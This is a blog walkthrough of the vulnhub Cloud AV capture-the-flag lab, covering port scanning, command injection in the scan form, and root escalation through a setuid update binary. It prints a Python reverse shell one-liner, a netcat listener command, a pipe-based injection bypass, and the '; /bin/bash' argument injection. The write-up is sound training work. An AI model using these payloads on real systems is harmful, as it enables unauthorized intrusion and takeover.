BoredHackerBlog: Cloud AV | vulnhub | Walkthrough

July 13, 2020
Read

BoredHackerBlog: Cloud AV

In this post, I am going to show how I solved the Cloud AV CTF from vulnhub, without using Metasploit. As the CTF description says:

Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service.

Currently, it's in beta mode. You've been asked to test the setup and find vulnerabilities and escalate privs.

Difficulty: Easy

Tasks involved:

  • port scanning
  • webapp attacks
  • sql injection
  • command injection
  • brute forcing
  • code analysis


In this VM, I have categorized the whole process in 3 steps.
1) Enumeration: Got an injection point.
2) Exploitation: Tried command injection.
3) Privilege Escalation: Used OS command injection.

Now I'm describing how I did it and what happened.

Enumeration:

(1) I have started by Nmap scan. I have used -A and -vv option to understand the response.



The usual port 80 or 443 is not serving the web. But 8080 port is running http and it is also Python powered backend.

(2) Visiting the site shows a login option and asks invite. I just randomly guessed password  and it worked in the first try. Didn't get anything interesting without this.



(3) Site redirected to : [IP]:8080/scan
I have tried directory brute forcing but Those are inaccessible.

(4) I have powered up the Burp proxy and tried to do SQLi but I haven't got any response. Maybe it takes too much time to receive a response.

Exploitation:


(5) Now I thought I can inject os command. PentestMonkey has a good list of reverse shell code. So I thought I can try from there. But I have specifically tried Python reverse shell because from Nmap scan I have found python is running in the back. The code is:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("My IP", My port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


Remember, change the red marked My IP to your VM IP and My port to your netcat listener port.


(6) Now I started my netcat listener using: nc -lvnp 4545

And then I have injected the code.




(7) After waiting a while nothing happened. Something wrong. So I have tried to modify the payload by using |

test | (my payload)


Wow! It worked. Remember sometime we need to bypass restriction by using >, <, |


(8) Manually checked every directory and there is nothing interesting. Then jumed to home directory using cd command. I have found a interesting file there. It is update_cloudav




This file has root permit and also a C source file.


(9) I have read the C source file and it says the program takes argument while running.



(10) Manually running the program says the same thing. It needs an argument while running.




Privilege Escalation:


(11) This update program runs a root level service. So we can generally try an OS command injection. I have used "; /bin/bash" as argument. Argument must be string and double-quoted. Otherwise, it doesn't work.



Awesome! Now I have the root access to this server.

Thanks for the reading.
Learn more about command injection from OWASP web






Tags :

No comments:

Subscribe to: Post Comments ( Atom )
Created By Themexpose